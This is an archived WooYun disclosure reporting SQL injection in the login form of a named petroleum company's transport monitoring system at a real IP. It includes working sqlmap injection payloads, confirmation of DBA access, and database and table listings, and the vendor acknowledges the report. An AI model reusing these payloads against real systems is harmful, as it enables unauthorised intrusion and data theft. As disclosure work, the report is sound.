乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
233333333333333
中石化河南石油分公司公路运输监控系统:
http://116.255.245.4/
测试:
GET /First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K%2BB56CB6ZSZ6K%2BvZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9%2FncBgGjrjotw%3D%3D&__EVENTVALIDATION=%2FwEWCAKYnoDGBQK%2FzIJyAu%2BL3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q%2BB2dnsBxZQ82IgNMvpwYB2Yg%3D&TextName=admin&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95 HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://116.255.245.4/First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dGVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKQ2hhbmdlQ29kZYtYv9GQsL%2FHP1r3%2FrC0k89yK3VJ&__EVENTVALIDATION=%2FwEWCALJoOOABwK%2FzIJyAu%2BL3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KuUeOZsKX%2FT764Da7qzFiJlVc1zs%3D&TextName=admin&TextPassword=admin&Validator=H202&Button1=%E7%99%BB%E5%BD%95Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Accept-Encoding: gzip, deflateHost: 116.255.245.4Proxy-Connection: Keep-AliveCookie: ASP.NET_SessionId=wv15ag45yrjbgczcbxqb1qbs; yzmcode=D0T8
数据库:
available databases [7]:[*] [ZSHJK-HN][*] [ZSHJK-NX][*] alarmimage[*] master[*] model[*] msdb[*] tempdb
权限:
sqlmap resumed the following injection point(s) from stored session:---Parameter: TextName (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMvpwYB2Yg=&TextName=admin';IF(1278=1278) SELECT 1278 ELSE DROP FUNCTION aEzX--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMvpwYB2Yg=&TextName=admin';WAITFOR DELAY '0:0:5'--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dAUP6aqM6K+B56CB6ZSZ6K+vZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkNoYW5nZUNvZGWN98dEWwWuaAuci9/ncBgGjrjotw==&__EVENTVALIDATION=/wEWCAKYnoDGBQK/zIJyAu+L3ekHAquo0NAHAunavacKAoznisYGArursYYIAtj2hb0KR3Q+B2dnsBxZQ82IgNMvpwYB2Yg=&TextName=admin' WAITFOR DELAY '0:0:5'--&TextPassword=123456&Validator=d0t8&Button1=%E7%99%BB%E5%BD%95---[20:21:30] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005[20:21:30] [INFO] testing if current user is DBAcurrent user is DBA: True
ZSHJK-HN:
[79 tables]+------------------+| BJLX || BaoJing || CLDD || CLZT || CheDui || CheLiang || DZSLX || DiSh@ || GPS || GPSZT || GpsZX || JKCS || LSJFCS || LSSDBJ || LSSFCS || LSSuoDD || LSSuoDK || LSSuoYC || LSWSFBJ || LSZKDK || Lin@ || QFKLX || QQZT || QianFeng || QianFengKa || QuanXian || SJZT || SPBaoJing || SPZX || SiJi || V_BaoJing || V_BaoJingZP || V_CLQF || V_CheDuiDiShi || V_CheLiang || V_DDXX || V_DDXX_MD || V_DDXX_YY || V_DiaoDu || V_JFCS || V_JKCL || V_JKMax || V_JKMaxAll || V_JKSD || V_JKSDHigh || V_JKSDLong || V_JKSJ || V_JKXH || V_QFBJ || V_QianFeng || V_QianFengKa || V_SFCS || V_SUODD || V_SUODK || V_SUOYC || V_SiJi || V_VehicleMoniter || V_WSFLK || V_YJQF || V_YJQianFeng || V_YJQianFengList || V_YongHu || V_Youzhan || V_ZKDK || V_data || V_yzyh || WCZT || YJQianFeng || YSZT || YZLX || YongHu || YouZhan || bd_t_offset || dtproperties || t_data || t_datanew || t_dzzl || t_dzzl_gps || t_offset |+------------------+
没有继续深入
危害等级:中
漏洞Rank:10
确认时间:2015-10-14 09:59
谢谢!我们将尽快整改。
暂无